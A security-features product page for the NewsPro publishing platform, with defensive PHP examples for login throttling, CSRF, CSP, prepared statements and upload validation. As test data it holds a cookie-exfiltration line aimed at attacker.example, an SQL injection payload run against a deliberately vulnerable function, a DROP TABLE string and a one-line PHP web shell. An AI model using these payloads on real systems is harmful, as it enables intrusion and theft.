
Enterprise-Grade Security

Every layer of your site is protected — from login to content delivery to your readers' data.

NewsPro implements security best practices at every layer of the stack. Login protection, IP-level controls, CSRF tokens, Content Security Policy headers, SQL injection prevention, secure sessions, and more — all active by default. You publish news. We handle the security.

  • Brute-force login protection with configurable rate limiting
  • IP allowlist and blocklist — permanently block bad actors
  • CSRF token protection on every form and action
  • Content Security Policy (CSP) headers on all pages
  • SQL injection prevention via PDO prepared statements
  • Secure session management — cryptographically random session tokens, HttpOnly/SameSite/Secure cookies
  • HTTPS enforced — free TLS (SSL) certificate on every site
  • Comment rate limiting — prevents spam floods
  • CSP violation reporting — get notified of injection attempts
  • PHP error display disabled in production — no information leakage

Login & Access Security

Brute-Force Protection

After a configurable number of failed login attempts, the IP is automatically blocked for a configurable time window (60 seconds up to 24 hours). Protects against password guessing attacks.

IP Allowlist

Allowlist trusted IPs that bypass rate limiting entirely. Useful for your office network or team VPN, so legitimate editors are never locked out. Keep the list to addresses you control: an allowlisted address gets unlimited login attempts, so accounts used from it still need strong, unique passwords.

IP Blocklist

Permanently block specific IP addresses or ranges. Any request from a blocked IP is rejected immediately — before it ever reaches your application.
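The three controls above fit together as one check that runs before the login form does any work. The following is an added example written for this page, not NewsPro's own code: a per-IP login throttle with a configurable failure threshold and block window, an allowlist that skips throttling, and a blocklist of single IPv4 addresses or CIDR ranges that rejects the request outright. The class name, the in-memory state and the sample addresses (RFC 5737 documentation ranges) are all assumptions; a real deployment would keep the state in a shared store such as a database table or Redis.

```php
<?php
// Added example (not NewsPro's code), PHP 8: per-IP login throttling with an
// allowlist that bypasses limits and a blocklist (IPs or CIDR ranges) that
// rejects requests outright. State is kept in an array for illustration.
declare(strict_types=1);

final class LoginGuard
{
    /** @var array<string, array{fails?: int[], blocked_until?: int}> */
    private array $state = [];

    public function __construct(
        private int $maxFailures = 5,        // failures before a temporary block
        private int $windowSeconds = 300,    // failures are counted inside this window
        private int $blockSeconds = 900,     // block duration; the page allows 60 s .. 24 h
        private array $allowlist = [],       // IPs that are never throttled
        private array $blocklist = [],       // IPs / CIDRs rejected before any processing
    ) {
        if ($blockSeconds < 60 || $blockSeconds > 86400) {
            throw new InvalidArgumentException('block window must be between 60 s and 24 h');
        }
    }

    /** True if $ip is on the blocklist, either exactly or inside a listed CIDR range. */
    public function isBlocklisted(string $ip): bool
    {
        foreach ($this->blocklist as $entry) {
            if (self::ipMatches($ip, $entry)) {
                return true;
            }
        }
        return false;
    }

    /** Gate to call before touching the credentials at all. */
    public function mayAttemptLogin(string $ip, int $now): bool
    {
        if ($this->isBlocklisted($ip)) {
            return false;                               // permanently blocked
        }
        if (in_array($ip, $this->allowlist, true)) {
            return true;                                // allowlisted: no throttling
        }
        return ($this->state[$ip]['blocked_until'] ?? 0) <= $now;
    }

    /** Record a failed attempt; returns true if this failure started a block. */
    public function recordFailure(string $ip, int $now): bool
    {
        if (in_array($ip, $this->allowlist, true)) {
            return false;
        }
        // Keep only failures still inside the sliding window, then add this one.
        $fails = array_filter(
            $this->state[$ip]['fails'] ?? [],
            fn(int $t) => $t > $now - $this->windowSeconds
        );
        $fails[] = $now;
        $this->state[$ip]['fails'] = array_values($fails);
        if (count($fails) >= $this->maxFailures) {
            $this->state[$ip]['blocked_until'] = $now + $this->blockSeconds;
            $this->state[$ip]['fails'] = [];           // counter restarts after the block lapses
            return true;
        }
        return false;
    }

    public function recordSuccess(string $ip): void
    {
        unset($this->state[$ip]);
    }

    /** IPv4 exact or CIDR match, e.g. "203.0.113.7" or "198.51.100.0/24". */
    private static function ipMatches(string $ip, string $entry): bool
    {
        if (!str_contains($entry, '/')) {
            return $ip === $entry;
        }
        [$net, $bits] = explode('/', $entry, 2);
        $ipLong  = ip2long($ip);
        $netLong = ip2long($net);
        if ($ipLong === false || $netLong === false) {
            return false;
        }
        $mask = $bits === '0' ? 0 : (~0 << (32 - (int)$bits)) & 0xFFFFFFFF;
        return ($ipLong & $mask) === ($netLong & $mask);
    }
}

// Demo with constructed addresses: 3 failures in the window earn a 600 s block.
$guard = new LoginGuard(maxFailures: 3, blockSeconds: 600,
    allowlist: ['192.0.2.10'], blocklist: ['198.51.100.0/24']);
$t = 1_700_000_000;
var_dump($guard->mayAttemptLogin('198.51.100.42', $t));     // inside the blocklisted range
for ($i = 0; $i < 3; $i++) { $guard->recordFailure('203.0.113.7', $t + $i); }
var_dump($guard->mayAttemptLogin('203.0.113.7', $t + 5));    // within the block window
var_dump($guard->mayAttemptLogin('203.0.113.7', $t + 601));  // after the block has lapsed
for ($i = 0; $i < 10; $i++) { $guard->recordFailure('192.0.2.10', $t); }
var_dump($guard->mayAttemptLogin('192.0.2.10', $t));         // allowlisted, never throttled
```

The blocklist check comes first and touches no session or database state, which is what "rejected before it reaches your application" has to mean in practice. The failure counter is a sliding window, so an attacker who spaces attempts just under the threshold still accumulates them until the window moves past the oldest one.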

Role-Based Access

Four permission levels: Admin, Editor, Writer, Contributor. Each role sees only what they're allowed to see and do. Writers can't access billing; Contributors can't publish without review.

Secure Sessions

Sessions use cryptographically random tokens with strict cookie settings (HttpOnly, SameSite, Secure). These flags keep the session cookie out of reach of injected scripts (HttpOnly), off plain HTTP (Secure) and out of cross-site requests (SameSite), which closes the common routes to session hijacking and cross-site request forgery.

CSRF Protection

Every form submission — login, article save, settings change, user action — includes a validated CSRF token. Forged requests from external sites are rejected.
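The session flags and the CSRF token described in the two sections above are usually set up in one place. What follows is an added example written for this page, not NewsPro's own code: the cookie parameters are set before the session starts, a per-session token is generated from PHP's CSPRNG, and every state-changing handler checks the submitted token with a constant-time comparison. The field name `_token`, the helper names and the CLI simulation of `$_SESSION` are assumptions.

```php
<?php
// Added example (not NewsPro's code), PHP 8: hardened session cookie settings
// plus a per-session CSRF token validated on every state-changing request.
declare(strict_types=1);

function startSecureSession(): void
{
    // Flags named on the page: HttpOnly (no script access), Secure (HTTPS only),
    // SameSite=Lax (the cookie is not sent on cross-site POSTs).
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    ini_set('session.use_strict_mode', '1');   // refuse session IDs the server never issued
    ini_set('session.use_only_cookies', '1');  // never accept a session ID from the URL
    session_start();
}

/** The session's CSRF token, created from a CSPRNG on first use. */
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Constant-time comparison: a wrong token fails without leaking where it diverged. */
function csrfTokenIsValid(?string $submitted): bool
{
    if ($submitted === null || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

/** Hidden field for any form that changes state (login, article save, settings). */
function csrfField(): string
{
    return '<input type="hidden" name="_token" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

/** First line of every POST handler: reject forged requests before doing anything else. */
function requireValidCsrf(): void
{
    if (!csrfTokenIsValid($_POST['_token'] ?? null)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
}

/** After login: rotate the session ID so a pre-login ID planted by an attacker is useless. */
function onSuccessfulLogin(int $userId): void
{
    session_regenerate_id(true);
    $_SESSION['user_id'] = $userId;
    unset($_SESSION['csrf_token']);   // the authenticated session gets a fresh token
}

// CLI demo without a web server: the session superglobal is simulated as a plain array.
if (PHP_SAPI === 'cli') {
    $_SESSION = [];
    $token = csrfToken();
    var_dump(csrfTokenIsValid($token));                        // the token issued to this session
    var_dump(csrfTokenIsValid('forged-token-from-evil-site'));  // a token another site guessed
    var_dump(csrfTokenIsValid(null));                          // a request that carries no token
    echo csrfField(), PHP_EOL;
}
```

SameSite and the token are complementary, not alternatives: SameSite stops the browser attaching the cookie to a cross-site POST, while the token catches requests from clients or browsers that do not honour it. Regenerating the session ID at login is what defeats session fixation, which cookie flags alone do not address.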

Infrastructure Security

Content Security Policy

CSP headers restrict which scripts, styles, and other resources the browser may load on your pages. Even if an attacker manages to inject markup, inline scripts and scripts from origins the policy does not allow are refused by the browser. Violations are reported back to the platform and logged for review.
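A policy only blocks injected scripts if it refuses inline code, which in turn means the site's own inline scripts need a per-request nonce. The example below is added for this page and is not NewsPro's code: it builds such a policy with a reporting directive and parses the JSON report a browser POSTs when it blocks something, flagging the script-src violations that look like injection attempts. The report path `/csp-report`, the host names and the constructed report are assumptions.

```php
<?php
// Added example (not NewsPro's code), PHP 8: nonce-based CSP with violation
// reporting, and a parser for the report body the browser sends back.
declare(strict_types=1);

function newNonce(): string
{
    return base64_encode(random_bytes(16));   // fresh per response; never reuse
}

/** Build the header value. Inline scripts run only if they carry this request's nonce. */
function buildCspHeader(string $nonce, string $reportPath = '/csp-report'): string
{
    $directives = [
        "default-src 'self'",
        "script-src 'self' 'nonce-{$nonce}'",   // no 'unsafe-inline': an injected <script> is refused
        "style-src 'self' 'nonce-{$nonce}'",
        "img-src 'self' data: https:",
        "object-src 'none'",                      // no plugin content
        "base-uri 'self'",                        // stop <base> from redirecting relative URLs
        "form-action 'self'",                     // forms may only submit back to this origin
        "frame-ancestors 'none'",                 // clickjacking protection
        "report-uri {$reportPath}",               // report-to is the successor; report-uri still widely supported
    ];
    return 'Content-Security-Policy: ' . implode('; ', $directives);
}

/**
 * Parse a violation report (JSON with a top-level "csp-report" object) into the
 * fields worth logging. Returns null if the body is not a CSP report.
 */
function parseCspReport(string $body): ?array
{
    $data = json_decode($body, true);
    if (!is_array($data) || !isset($data['csp-report']) || !is_array($data['csp-report'])) {
        return null;
    }
    $r = $data['csp-report'];
    return [
        'page'      => (string)($r['document-uri'] ?? ''),
        'directive' => (string)($r['violated-directive'] ?? ($r['effective-directive'] ?? '')),
        'blocked'   => (string)($r['blocked-uri'] ?? ''),
        'sample'    => substr((string)($r['script-sample'] ?? ''), 0, 200),
        'source'    => ($r['source-file'] ?? '') . ':' . ($r['line-number'] ?? ''),
    ];
}

/** Heuristic: inline or eval violations on script-src are the ones that resemble injection. */
function looksLikeInjection(array $report): bool
{
    return str_starts_with($report['directive'], 'script-src')
        && in_array($report['blocked'], ['inline', 'eval', ''], true);
}

$nonce = newNonce();
if (PHP_SAPI !== 'cli') {
    header(buildCspHeader($nonce));
} else {
    echo buildCspHeader($nonce), PHP_EOL;
}
// The site's own inline script carries the nonce; an injected one cannot know it.
echo '<script nonce="' . htmlspecialchars($nonce, ENT_QUOTES, 'UTF-8') . '">/* allowed */</script>', PHP_EOL;

// Constructed report, shaped like what a browser POSTs after blocking an injected inline script.
$constructedReport = json_encode(['csp-report' => [
    'document-uri'       => 'https://example-news.test/article/42',
    'violated-directive' => "script-src 'self'",
    'blocked-uri'        => 'inline',
    'script-sample'      => 'fetch("https://attacker.example/?c="+document.cookie)',
    'source-file'        => 'https://example-news.test/article/42',
    'line-number'        => 88,
]]);
$parsed = parseCspReport($constructedReport);
var_dump($parsed !== null && looksLikeInjection($parsed));
print_r($parsed);
```

Two things to check when reviewing reports: browser extensions generate a steady background of `inline` violations on pages they modify, so alert on volume and on `script-sample` content rather than on every report; and the `report-uri` endpoint must itself be exempt from CSRF checks, since the browser posts to it without any token.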

SQL Injection Prevention

Every database query uses PDO prepared statements with parameter binding. User input travels to the database as a bound value, never spliced into the query text, so the database never interprets it as SQL.
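To make the distinction concrete, here is an added example written for this page, not NewsPro's code: the string-concatenation pattern that prepared statements replace, side by side with the bound-parameter version, run against an in-memory SQLite database with two constructed rows. It also shows the one place parameter binding cannot help, a column name in `ORDER BY`, which has to be checked against an allowlist instead. The table, rows and function names are assumptions; the `pdo_sqlite` extension is required.

```php
<?php
// Added example (not NewsPro's code), PHP 8 + pdo_sqlite: injectable string
// building next to the PDO prepared statement that replaces it.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // let the driver prepare natively where it can
]);
$pdo->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, slug TEXT, title TEXT, published INTEGER)');
$pdo->exec("INSERT INTO articles (slug, title, published) VALUES
    ('launch', 'Launch Day', 1), ('draft-scoop', 'Unpublished Scoop', 0)");

// VULNERABLE: the slug becomes part of the SQL text, so a crafted slug is parsed as SQL.
function findPublishedUnsafe(PDO $pdo, string $slug): array
{
    $sql = "SELECT title FROM articles WHERE published = 1 AND slug = '$slug'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// HARDENED: the slug is a bound parameter; the database receives it as data only.
function findPublished(PDO $pdo, string $slug): array
{
    $stmt = $pdo->prepare('SELECT title FROM articles WHERE published = 1 AND slug = :slug');
    $stmt->execute([':slug' => $slug]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// CAVEAT: identifiers cannot be bound. A sort column chosen by the user must be
// matched against an allowlist, then quoted; binding it would not work.
function listArticles(PDO $pdo, string $sortBy): array
{
    $allowed = ['id', 'title', 'slug'];
    if (!in_array($sortBy, $allowed, true)) {
        throw new InvalidArgumentException('unknown sort column');
    }
    return $pdo->query("SELECT slug FROM articles ORDER BY \"$sortBy\"")
               ->fetchAll(PDO::FETCH_COLUMN);
}

// Classic tautology payload: the OR makes the WHERE clause true for every row and
// the trailing comment swallows the closing quote the code appended.
$payload = "x' OR 1=1 --";
print_r(findPublishedUnsafe($pdo, $payload));   // the unpublished draft leaks along with everything else
print_r(findPublished($pdo, $payload));         // matches only an article whose slug is literally the payload
print_r(listArticles($pdo, 'title'));
try {
    listArticles($pdo, 'title; DROP TABLE articles');
} catch (InvalidArgumentException $e) {
    echo 'Rejected: ', $e->getMessage(), PHP_EOL;
}
```

Prepared statements are only a guarantee if every query uses them, which is why the page's "every database query" wording matters: one forgotten `query()` with interpolated input undoes the protection for that path. Identifiers, `LIMIT` values on some drivers and `IN (...)` lists with a variable number of items are the usual places where developers fall back to string building and need the allowlist approach shown above.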

HTTPS Everywhere

All sites run on HTTPS. Free TLS (SSL) certificates are provisioned automatically. Plain HTTP requests are redirected to HTTPS, so data in transit is always encrypted.

No Error Leakage

PHP error display is disabled in production (display_errors off). Errors are logged internally but never shown to visitors, so an attacker who deliberately triggers an error learns no file paths, query text or stack traces from the response.

Common Questions

Yes. Reader data is stored in your isolated tenant database. All connections are encrypted. We never sell or share reader data with third parties.

Yes. In Security Settings, add any IP (or comma-separated list of IPs) to the blocklist. Requests from blocked IPs are rejected immediately.

After the configured number of failed attempts (you set the threshold), the IP is automatically blocked for the configured window. You can also whitelist your own IP so you're never accidentally locked out.

Yes. Uploaded files are validated for MIME type, renamed to random strings, and stored outside the web root. PHP execution in the uploads directory is blocked at the server level.
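The upload handling described in that answer is a four-step recipe, and each step closes a different hole. The following is an added example written for this page, not NewsPro's code: the file's type is sniffed from its bytes with `finfo` rather than taken from the client's declared Content-Type, the image is additionally parsed to confirm it decodes, the stored name is random with an extension derived from the detected type, and the destination directory is outside the document root. The directory path, the helper names and the two constructed test files (a 1x1 PNG and a PHP payload wearing a `.png` extension) are assumptions.

```php
<?php
// Added example (not NewsPro's code), PHP 8 + fileinfo: validate an uploaded
// image by content, rename it randomly and store it outside the web root.
declare(strict_types=1);

const UPLOAD_DIR = '/var/newspro/uploads';    // assumed layout: not under the document root
const MAX_BYTES  = 5 * 1024 * 1024;

/** Check a file's real type; returns the extension to store it under, or throws. */
function validateImage(string $path, int $size): string
{
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif', 'image/webp' => 'webp'];
    if ($size <= 0 || $size > MAX_BYTES) {
        throw new RuntimeException('file is empty or too large');
    }
    // Magic-byte sniffing of the contents. $_FILES[...]['type'] is attacker-controlled and never consulted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($path);
    if ($mime === false || !isset($allowed[$mime])) {
        throw new RuntimeException('rejected type: ' . ($mime === false ? 'unknown' : $mime));
    }
    // Second opinion: the image library must be able to parse it as a real image.
    if (@getimagesize($path) === false) {
        throw new RuntimeException('not a decodable image');
    }
    return $allowed[$mime];
}

/** Store one entry of $_FILES under a random name; the original filename is discarded entirely. */
function storeUploadedImage(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with code ' . ($file['error'] ?? 'none'));
    }
    $ext  = validateImage($file['tmp_name'], (int)$file['size']);
    $name = bin2hex(random_bytes(16)) . '.' . $ext;   // CSPRNG name: no path or .php fragments survive
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);                                // readable by the app, never executable
    return $name;
}

// CLI demo with constructed files: a genuine 1x1 PNG and a PHP web shell saved as "image.png".
$pngBytes = base64_decode(
    'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='
);
$tmp = sys_get_temp_dir();
$good = $tmp . '/' . bin2hex(random_bytes(4)) . '.png';
$bad  = $tmp . '/' . bin2hex(random_bytes(4)) . '.png';
file_put_contents($good, $pngBytes);
file_put_contents($bad, "<?php system(\$_GET['c']); ?>");
foreach ([$good, $bad] as $f) {
    try {
        echo basename($f), ': accepted as ', validateImage($f, (int)filesize($f)), PHP_EOL;
    } catch (RuntimeException $e) {
        echo basename($f), ': rejected (', $e->getMessage(), ')', PHP_EOL;
    }
    unlink($f);
}
```

The `.png` extension on the second file is irrelevant to the check, which is the point: extension and client-declared type are both under the attacker's control, while the bytes are what the server actually has. Storing outside the web root means the files are served through the application, so even a sniffing mistake produces a download rather than code execution; the web-server rule the answer mentions, denying PHP execution inside the uploads directory, is a second layer for the case where the directory is ever exposed directly.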

Yes. The platform is regularly reviewed for OWASP Top 10 vulnerabilities. Security patches are deployed automatically to all sites.

Ready to Get Started?

Create your news site in 60 seconds. All features included in every plan.
